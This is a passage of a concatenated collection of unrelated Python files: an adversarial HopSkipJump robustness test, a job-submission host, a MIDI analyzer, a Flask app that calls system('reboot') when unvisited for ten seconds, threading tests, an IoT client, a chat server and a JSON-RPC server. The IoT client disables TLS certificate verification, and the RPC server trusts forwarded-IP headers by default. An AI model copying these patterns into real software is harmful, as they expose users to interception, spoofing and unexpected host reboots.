adv_crafter = HopSkipJump(classifier, log_file=log_name, max_eval=1, init_eval=1, max_iter=1)
# single_image = x_test
x_test_adv = adv_crafter.generate(x=x_test)
else:
adv_crafter = HopSkipJump(classifier, log_file=log_name)
x_test_adv = adv_crafter.generate(x=x_test)
# Evaluate the classifier on the adversarial examples
preds = np.argmax(classifier.predict(x_test_adv), axis=1)
acc = np.sum(preds == np.argmax(y_test, axis=1)) / y_test.shape[0]
print("function1: {}, function2: {}".format(func1, func2))
print("\nTest accuracy on adversarial sample: %.2f%% " % (acc * 100))
accuracy_after_attack = acc * 100
with open(log_name, 'a') as log_file:
result_before = "Test accuracy: %.2f%%\n" % accuracy_before_attack
result_after = "Test accuracy on adversarial sample: %.2f%%\n" % accuracy_after_attack
log_file.write(result_before)
log_file.write(result_after)
activation_functions = [
'relu',
'gelu',
'elu',
'selu',
'tanh',
'sigmoid',
]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', action='store_true', help="debug, very short hop_skip run")
parser.add_argument('-all', action='store_true', help="Run all activation function tests in parallel")
parser.add_argument('-epoch', action="store", help = "number of epochs for model. default 5")
args = parser.parse_args()
if not args.all:
main('exponential', 'exponential', args)
else:
for func in activation_functions:
main(func, func, args)
# proc_list = [None] * len(activation_functions)
# for ind, func in enumerate(activation_functions):
# proc_list[ind] = multiprocessing.Process(target=main, args=(func, func, args))
# proc_list[ind].start()
#
# for proc in proc_list:
# proc.join()
# print(f'{proc} is finished')
|
submithost.py
|
"""
This file is part of PUQ
Copyright (c) 2013 PUQ Authors
See LICENSE file for terms.
"""
import os, time, sys
from monitor import TextMonitor
from subprocess import Popen, PIPE
import numpy as np
from logging import debug
from hosts import Host
from shutil import rmtree
from stat import S_ISDIR
from glob import glob
from threading import Thread, Event
from util import flushStdStreams
class SubmitHost(Host):
"""
Create a host object that uses the hub submit command.
Args:
cpus: Number of cpus each process uses. Default=1.
cpus_per_node: How many cpus to use on each node. Default=1.
"""
def __init__(self, venue=None, cpus=1, cpus_per_node=1, walltime=60):
Host.__init__(self)
self.cpus = cpus
self.cpus_per_node = cpus_per_node
self.hostname = venue
self.jobs = []
# Creates a CSV file compatible with the HubZero submit command
def add_jobs(self, fname, args):
import shlex
self.fname = fname
first = True
try:
os.mkdir(fname)
except:
pass
f = open(os.path.join(fname,'input.csv'), 'w')
for a in args:
if first:
first = False
print >>f, ', '.join(['@@'+b[0] for b in a])
cmds = [(x[0], '@@'+x[0]) for x in a]
print >>f, ','.join([str(b[1]) for b in a])
f.close()
scmd = "submit --runName=puq -d input.csv %s" % self.prog.cmd(cmds)
self.add_job(shlex.split(scmd), '', 0, '')
# run, monitor and status return
# True (1) is successful
# False (0) for errors or unfinished
def run(self):
""" Run all the jobs in the queue """
self._running = []
self._monitor = TextMonitor()
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
err = self._run()
os.chdir(cwd)
if err == False:
rmtree(self.fname, ignore_errors=True)
try:
os.remove(self.fname+'.hdf5')
except:
pass
return False
return True
def peg_parse(self):
# parse the contents of the pegasusstatus.txt file
done = 0
filename = 'pegasusstatus.txt'
with open(filename) as f:
for line in f:
if line.startswith('%DONE'):
done = float(line.split()[1])
break
return done
def status_monitor(self):
# Watch pegasusstatus.txt for status changes.
# This could possibly be done more efficiently
# using filesystem notification but in practice
# this turned out to be more reliable across
# different OS versions.
found = False
while not found and not self.stop.is_set():
try:
os.chdir('puq/work')
found = True
except:
self.stop.wait(10)
done = -1
while not self.stop.is_set():
try:
d = self.peg_parse()
except:
d = done
if d > done:
print '=RAPPTURE-PROGRESS=>%d Running' % (int(d))
flushStdStreams('stdout')
done = d
if int(d) >= 100:
self.stop.set()
else:
self.stop.wait(10)
def _run(self):
j = self.jobs[0]
print '=RAPPTURE-PROGRESS=>0 Starting'
flushStdStreams('stdout')
try:
myprocess = Popen(j['cmd'], stdout=PIPE, stderr=PIPE, bufsize=0)
except Exception, e:
print 'Command %s failed: %s' % (' '.join(j['cmd']), e)
flushStdStreams('stdout')
self.stop = Event()
p2 = Thread(target=self.status_monitor)
p2.daemon = True
p2.start()
# wait for command to finish
err = True
try:
ret = myprocess.wait()
if ret:
err = False
print 'Submit failed with error %s' % ret
whocares = os.listdir(os.getcwd())
if os.path.exists('puq'):
fn = glob('puq/*.stderr')
if fn:
with open(fn[0]) as f:
print f.read()
flushStdStreams('stdout')
except KeyboardInterrupt:
print '\nPUQ interrupted. Cleaning up. Please wait...\n'
err = False
myprocess.kill()
j['status'] = 'F'
self.stop.set()
if p2 and p2.is_alive():
p2.join()
return err
# Collect the data from individual stdout and stderr files into
# the HDF5 file. Remove files when finished.
def collect(self, hf):
# Collect results from output files
debug("Collecting")
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
hf.require_group('output')
jobs_grp = hf.require_group('output/jobs')
# find the jobs that are completed and, if the stdout/stderr files are there,
# move them to hdf5
finished_jobs = []
os.chdir('puq')
# Get the job stats. Do this in a loop because it looks like
# sometimes this code gets run before pegasus generates the file.
tries = 2
while tries > 0:
try:
data = np.genfromtxt('pegasusjobstats.csv', usecols=(2,3,4,7,15,16), dtype='string',
skip_header=26, comments='#', delimiter=',')
tries = 0
except:
tries -= 1
if tries > 0:
time.sleep(30)
job = {}
for j, _try, site, _time, exitcode, host in data:
if site == 'local':
continue
j = j[j.rfind('_')+1:]
job[j] = (int(_try), site, float(_time), int(exitcode), host)
times = np.empty((len(job)))
for j in job:
jobnum = int(j)-1
times[jobnum] = job[j][2]
if job[j][3] == 0:
finished_jobs.append(jobnum)
if not S_ISDIR(os.stat(j).st_mode):
print "ERROR: job %s directory not found" % j
continue
os.chdir(j)
grp = jobs_grp.require_group(str(jobnum))
for ext in ['out', 'err']:
outfile = glob('*.std%s' % ext)
if outfile:
f = open(outfile[0], 'r')
grp.create_dataset('std%s' % ext, data=f.read())
f.close()
for fn in self.prog.outfiles:
try:
f = open(fn, 'r')
grp.create_dataset(fn, data=f.read())
f.close()
except:
pass
os.chdir('..')
if 'time' in jobs_grp:
del jobs_grp['time']
jobs_grp['time'] = times
os.chdir(cwd)
rmtree(self.fname)
return finished_jobs
|
Midi_Analyzer.py
|
from src import Scale
import time
import threading
import mido
from mido import MidiFile, MidiTrack
# https://mido.readthedocs.io/en/latest/midi_files.html
# http://support.ircam.fr/docs/om/om6-manual/co/MIDI-Concepts.html
tracks = []
def print_ports():
# for potential sound generation...
# nonfunctional
inports = mido.get_input_names()
outports = mido.get_output_names()
for i, p in enumerate(inports):
print('Inport: ' + i + ' ' + p)
for i, p in enumerate(outports):
print('Outport: ' + i + ' ' + p)
def print_notes():
for msg in midi_file:
try:
print(f'Channel: {msg.channel} - {msg.type} - Note: {msg.note}({Scale.get_note_name(msg.note)}{msg.note//12 - 1}) - Vol: {msg.velocity} - Time: {msg.time}')
except:
i=0
def print_messages():
for msg in midi_file:
print(msg)
def print_meta_messages():
for msg in midi_file:
if msg.is_meta:
print(msg)
def play_midi(m):
print(f'Loading {m}...')
for msg in m:
time.sleep(msg.time)
try:
print(f'{msg}')
except:
nope = 0
def set_tracks():
print(f'Tracks: {len(midi_file.tracks)}')
for track in midi_file.tracks:
print(track.name)
tracks.append(track)
def print_tracks():
for track in tracks:
print(track.name)
for msg in track:
print(f'{track.name} - {msg}')
def print_tracks_info():
print(f'Tracks: {len(tracks)}')
for track in tracks:
print(track.name)
def play_track(track):
for msg in track:
print(msg)
time.sleep(msg.time)
def play_tracks():
for track in tracks:
thrd = threading.Thread(target=play_track(track))
for msg in track:
print(f'{track}: {msg}')
time.sleep(msg.time)
def get_max_channel():
max = -1
for msg in midi_file:
try:
if msg.channel > max:
max = msg.channel
except:
i = 0
return max
def copy_note(item, n, velocity, length):
item.copy_note(note=n, velocity=velocity, time=length)
def copy_file(file):
mid = MidiFile()
for i, track in enumerate(file.tracks):
mid.tracks.append(MidiTrack())
for msg in track:
if msg.type == 'note_on' or msg.type == 'note_off' or msg.type == 'program_change':
mid.tracks[i].append(msg.copy())
filename = '../generated.mid'
mid.save(filename)
return filename
file_name = '../../Example MIDI Files/Mario_something.mid'
midi_file = MidiFile(file_name)
print_messages()
|
app.py
|
#!/usr/bin/python3
from flask import Flask
from datetime import datetime, timedelta
from threading import Thread
from os import system
from random import randint
last_load = datetime.now()
def grim_reaper():
'''
If site not loaded for 10s reboot host
reboot can be prevented by calling life_line()
'''
s10 = timedelta(seconds=10)
while True:
if (last_load + s10) < datetime.now():
system("reboot")
app = Flask(__name__)
@app.route("/")
def life_line():
'''
Save the site from grim_reaper() for 10s
'''
global last_load
last_load = datetime.now()
return("thank you for saving me for another 10 sec")
if __name__ == "__main__":
t = Thread(target=grim_reaper)
t.start()
app.run(host="0.0.0.0", port=randint(1024,50000), debug=False)
|
test_synchronized.py
|
# -*- coding: utf-8 -*-
'''
Copyright 2014, 2015 Yoshida Shin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import threading
import time
import thread_utils
TEST_INTERVAL = 0.1
TEST_COUNT = 5
def test_function_simultaneous_access():
"""
Only one thread can access to decorated function.
"""
@thread_utils.synchronized
def foo(n):
time.sleep(n)
threads = [threading.Thread(target=foo, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_method_simultaneous_access():
"""
Only one thread can access to decorated method.
"""
class Foo(object):
@thread_utils.synchronized
def bar(self, n):
time.sleep(n)
# Call method of the same object.
foo = Foo()
threads = [threading.Thread(target=foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
# same method of various objects.
threads = [threading.Thread(target=Foo().bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_class_method_simultaneous_access():
"""
Only one thread can access to decorated class method.
"""
class Foo(object):
@classmethod
@thread_utils.synchronized
def bar(cls, n):
time.sleep(n)
threads = [threading.Thread(target=Foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
def test_static_method_simultaneous_access():
"""
Only one thread can access to decorated static method.
"""
class Foo(object):
@staticmethod
@thread_utils.synchronized
def bar(n):
time.sleep(n)
threads = [threading.Thread(target=Foo.bar, args=(TEST_INTERVAL,))
for i in range(TEST_COUNT)]
start = time.time()
[t.start() for t in threads]
[t.join() for t in threads]
assert (time.time() - start) > TEST_INTERVAL * TEST_COUNT
|
entity.py
|
import contextlib
import requests
import warnings
import json
import asyncio
import aiohttp
from time import time
import threading
requests.packages.urllib3.disable_warnings()
from sys import platform
class Entity(object):
""" The entity object represents any of the IoT entities registered with the RBCCPS IoT Data Exchange & Analytics
Middleware (IDEAM). It can do publish, subscribe, historical data, bind and unbind operations.
Details of these operations are specified in the https://rbccps.org/smartcity.
"""
def __init__(self, entity_id, entity_api_key):
self.entity_id = entity_id
self.owner_api_key = entity_api_key
self.entity_api_key = ""
self.base_url = "https://smartcity.rbccps.org/"
self.subscribe_data = {}
self.event_loop = asyncio.get_event_loop()
def __del__(self):
self.stop_subscribe()
def set_base_url(self, value):
self.base_url = value
return self.base_url
def set_entity_api_key(self, value):
self.entity_api_key = value
return self.entity_api_key
def entity_api_key(self):
return self.entity_api_key
def subscribe_data(self):
return self.subscribe_data
def register(self):
""" Registers a new device with the name entity_id. This device has permissions for services like subscribe,
publish and access historical data.
"""
register_url = self.base_url + "api/0.1.0/register"
register_headers = {
"apikey": str(self.owner_api_key),
"resourceID": str(self.entity_id),
"serviceType": "publish,subscribe,historicData"
}
with self.no_ssl_verification():
r = requests.get(register_url, {}, headers=register_headers)
response = r.content.decode("utf-8")
if "APIKey" in str(r.content.decode("utf-8")):
response = json.loads(response[:-331] + "}") # Temporary fix to a middleware bug, should be removed in future
response["Registration"] = "success"
else:
response = json.loads(response)
response["Registration"] = "failure"
return response
@contextlib.contextmanager
def no_ssl_verification(self):
""" Requests module fails due to lets encrypt ssl encryption. Will be fixed in the future release."""
try:
from functools import partialmethod
except ImportError:
# Python 2 fallback: https://gist.github.com/carymrobbins/8940382
from functools import partial
class partialmethod(partial):
def __get__(self, instance, owner):
if instance is None:
return self
return partial(self.func, instance, *(self.args or ()), **(self.keywords or {}))
old_request = requests.Session.request
requests.Session.request = partialmethod(old_request, verify=False)
warnings.filterwarnings('ignore', 'Unverified HTTPS request')
yield
warnings.resetwarnings()
requests.Session.request = old_request
def publish(self, data):
""" This function allows an entity to publish data to the middleware.
Args:
data (string): contents to be published by this entity.
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
publish_url = self.base_url + "api/0.1.0/publish"
publish_headers = {"apikey": self.entity_api_key}
publish_data = {
"exchange": "amq.topic",
"key": str(self.entity_id),
"body": str(data)
}
with self.no_ssl_verification():
r = requests.post(publish_url, json.dumps(publish_data), headers=publish_headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'publish message ok' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def db(self, entity, query_filters="size=10"):
""" This function allows an entity to access the historic data.
Args:
entity (string): Name of the device to listen to
query_filters (string): Elastic search response format string
example, "pretty=true&size=10"
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
historic_url = self.base_url + "api/0.1.0/historicData?" + query_filters
historic_headers = {
"apikey": self.entity_api_key,
"Content-Type": "application/json"
}
historic_query_data = json.dumps({
"query": {
"match": {
"key": entity
}
}
})
with self.no_ssl_verification():
r = requests.get(historic_url, data=historic_query_data, headers=historic_headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
else:
r = r.content.decode("utf-8")
response = r
return response
def bind(self, devices_to_bind):
""" This function allows an entity to list the devices to subscribe for data. This function must be called
at least once, before doing a subscribe. Subscribe function will listen to devices that are bound here.
Args:
devices_to_bind (list): an array of devices to listen to.
Example bind(["test100","testDemo"])
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
url = self.base_url + "api/0.1.0/subscribe/bind"
headers = {"apikey": self.entity_api_key}
data = {
"exchange": "amq.topic",
"keys": devices_to_bind,
"queue": self.entity_id
}
with self.no_ssl_verification():
r = requests.post(url, json=data, headers=headers)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'bind queue ok' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def unbind(self, devices_to_unbind):
""" This function allows an entity to unbound devices that are already bound.
Args:
devices_to_unbind (list): an array of devices that are to be unbound ( stop listening)
Example unbind(["test10","testDemo105"])
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
url = self.base_url + "api/0.1.0/subscribe/unbind"
headers = {"apikey": self.entity_api_key}
data = {
"exchange": "amq.topic",
"keys": devices_to_unbind,
"queue": self.entity_id
}
with self.no_ssl_verification():
r = requests.delete(url, json=data, headers=headers)
print(r)
response = dict()
if "No API key" in str(r.content.decode("utf-8")):
response["status"] = "failure"
r = json.loads(r.content.decode("utf-8"))['message']
elif 'unbind' in str(r.content.decode("utf-8")):
response["status"] = "success"
r = r.content.decode("utf-8")
else:
response["status"] = "failure"
r = r.content.decode("utf-8")
response["response"] = str(r)
return response
def subscribe(self, devices_to_bind=[]):
""" This function allows an entity to subscribe for data from the devices specified in the bind operation. It
creates a thread with an event loop to manager the tasks created in start_subscribe_worker.
Args:
devices_to_bind (list): an array of devices to listen to
"""
if self.entity_api_key == "":
return {'status': 'failure', 'response': 'No API key found in request'}
self.bind(devices_to_bind)
loop = asyncio.new_event_loop()
t1 = threading.Thread(target=self.start_subscribe_worker, args=(loop,))
t1.daemon = True
t1.start()
def start_subscribe_worker(self, loop):
""" Switch to new event loop as a thread and run until complete. """
url = self.base_url + "api/0.1.0/subscribe"
task = loop.create_task(self.asynchronously_get_data(url + "?name={0}".format(self.entity_id)))
asyncio.set_event_loop(loop)
loop.run_until_complete(task)
self.event_loop = loop
async def asynchronously_get_data(self, url):
""" Asynchronously get data from Chunked transfer encoding of https://smartcity.rbccps.org/api/0.1.0/subscribe.
(Only this function requires Python 3. Rest of the functions can be run in python2.
Args:
url (string): url to subscribe
"""
headers = {"apikey": self.entity_api_key}
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
async with session.get(url, headers=headers, timeout=3000) as response:
while True: # loop over for each chunk of data
chunk = await response.content.readchunk()
if not chunk:
break
if platform == "linux" or platform == "linux2": # In linux systems, readchunk() returns a tuple
chunk = chunk[0]
resp = dict()
resp["data"] = chunk.decode()
current_milli_time = lambda: int(round(time() * 1000))
resp["timestamp"] = str(current_milli_time())
self.subscribe_data = resp
except Exception as e:
print("\n********* Oops: " + url + " " + str(type(e)) + str(e) + " *********\n")
print('\n********* Closing TCP: {} *********\n'.format(url))
def stop_subscribe(self):
""" This function is used to stop the event loop created when subscribe is called. But this function doesn't
stop the thread and should be avoided until its completely developed.
"""
asyncio.gather(*asyncio.Task.all_tasks()).cancel()
self.event_loop.stop()
self.event_loop.close()
|
server.py
|
import socket
import sys
import threading
import selectors
MAXBYTES = 1
MOTD = "Wazzup yoooooo"
namedict = {} #Dict with name as key
sockdict = {} #Dict with socket as key
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
loc = "0.0.0.0"
verbose = False
HELP = "help:\n/help\t\tprints help menu\n/users\t\tprint list of users\n/shutdown\tshut down server"
lock = threading.Lock()
finish = False
def addUser(name,clientsocket):
##MUTEX HERE##
with lock:
if(name in namedict):
print("Taken.")
##CLOSE MUTEX##
return -1
else:
namedict[name] = clientsocket
sockdict[clientsocket] = name
##CLOSE MUTEX##
return 0
def removeUser(clientsocket):
with lock:
##MUTEX HERE##
if clientsocket in sockdict:
name = sockdict[clientsocket]
del sockdict[clientsocket]
del namedict[name]
##CLOSE MUTEX##
return name
else:
##CLOSE MUTEX##
return None
def doLogin(clientsocket, buf):
if(buf == b"ME2U\r\n\r\n"):
clientsocket.send(b"U2EM\r\n\r\n")
else:
print("Junk. Closing")
exit(-1)
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf += clientsocket.recv(MAXBYTES)
if(buf.startswith(b"IAM")):
cmd = buf.split(b" ")
if verbose: print("The name is:",cmd[1].replace(b"\r\n\r\n",b"").decode())
e = addUser(cmd[1].replace(b"\r\n\r\n",b"").decode(),clientsocket)
if(e == -1):
clientsocket.send(b"ETAKEN\r\n\r\n")
else:
if verbose: print("New user!")
clientsocket.send(b"MAI\r\n\r\n")
clientsocket.send(f"MOTD {MOTD}\r\n\r\n".encode())
else:
print("idk what happens in this case -- NON-IAM")
def thread_function(clientsocket,buf):
###REMEMBER: CLIENTSOCKET IS THE SOCKET THIS THREAD READS FROM, IT NEVER CHANGES###
doLogin(clientsocket, buf)
#Listen on info from my clientsocket
while(not finish):
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf+= clientsocket.recv(MAXBYTES)
print("read buf")
print(buf)
## Do Stuff based on what received.
t = buf.split(b" ")
cmd = t[0].replace(b"\r\n\r\n",b"")
print("t")
print(t)
print(cmd)
if cmd == b"TO":
if verbose: print("cmd is TO")
name = t[1].replace(b"\r\n\r\n",b"").decode()
print("name", name)
print(sockdict[clientsocket])
if(name == sockdict[clientsocket]):
if verbose: print("TO to self")
clientsocket.send(f"EDNE {name}\r\n\r\n".encode())
if verbose: print(f"Sent EDNE to {name}")
continue;
elif name in namedict:
t[2:] = [ word.decode() for word in t[2:] ]
msg = " ".join(t[2:])
msg = msg.replace("\r\n\r\n", "")
if verbose: print("msg", msg)
myname = sockdict[clientsocket]
if verbose: print("sending FROM", myname, msg)
sendString = f"FROM {myname} {msg}".encode() #TODO: Something here is going wrong. Might be from client though.
if verbose: print("sendString", sendString)
sendLoc = namedict[name]
sendLoc.send(sendString)
else:
clientsocket.send(f"EDNE {name}\r\n\r\n".encode())
if verbose: print("sent EDNE")
elif cmd == b"LISTU":
if verbose: print("Sending UTSIL")
sendString = b"UTSIL "
for n in namedict:
sendString += f"{n} ".encode()
sendString+=b"\r\n\r\n"
clientsocket.send(sendString)
if verbose: print("Sent UTSIL")
elif cmd == b"MORF":
if verbose: print("is MORF")
name = t[1].replace(b"\r\n\r\n",b"").decode()
myname = sockdict[clientsocket]
sendLoc = namedict[name]
sendLoc.send(f"OT {myname}\r\n\r\n".encode())
if verbose: print(f"sent OT {myname}\r\n\r\n")
elif cmd == b"BYE":
if verbose: print("Goodbye")
name = removeUser(clientsocket)
clientsocket.send(b"EYB\r\n\r\n")
for x in sockdict:
x.send(f"UOFF {name}\r\n\r\n".encode())
#exit(0)
return finish
else:
print("Garbage command. Exiting")
exit(-1)
return finish
def accept():
(clientsocket, address) = serversocket.accept()
buf = b""
while not buf.endswith(b"\r\n\r\n"):
buf += clientsocket.recv(MAXBYTES)
if verbose: print("buf loop, read", buf)
## Each individual thread will do this with their client:
threading.Thread(target=thread_function,args=(clientsocket,buf),daemon=True).start()
def readIn():
read_stdin = sys.stdin.readline()
if verbose: print("read from selector", read_stdin)
if read_stdin == "/users\n":
print("users:")
for n in namedict:
print(n)
elif read_stdin == "/help\n":
print(HELP)
elif read_stdin == "/shutdown\n":
shutdown()
def shutdown():
finish = True
for th in threading.enumerate():
if th != threading.current_thread():
th.join(timeout=1) # wait for child threads to finish
for sock in sockdict:
print("closing", sock)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
print("closing serversocket")
serversocket.shutdown(socket.SHUT_RDWR)
serversocket.close()
print("exiting")
exit()
if __name__ == '__main__':
print(sys.argv)
if(sys.argv[1] == "-h"):
print(HELP)
exit(0)
elif(sys.argv[1] == "-v"):
verbose = True
try:
numWorkers = int(sys.argv[3])
except:
print("numWorkers must be an integer.")
exit(-1)
serversocket.bind((loc,int(sys.argv[2])))
serversocket.listen(numWorkers)
MOTD = sys.argv[4]
else:
try:
numWorkers = int(sys.argv[2])
except:
print("numWorkers must be an integer.")
exit(-1)
serversocket.bind((loc,int(sys.argv[1])))
serversocket.listen(numWorkers)
MOTD = sys.argv[3]
# prepare select to read stdin or socket accept
sel = selectors.DefaultSelector()
sel.register(sys.stdin, selectors.EVENT_READ, readIn)
sel.register(serversocket, selectors.EVENT_READ, accept)
while True:
events = sel.select(1)
for key, mask in events:
callback = key.data
callback()
|
kb_variationServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_variation.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_variation'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_variation.kb_variationImpl import kb_variation # noqa @IgnorePep8
impl_kb_variation = kb_variation(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
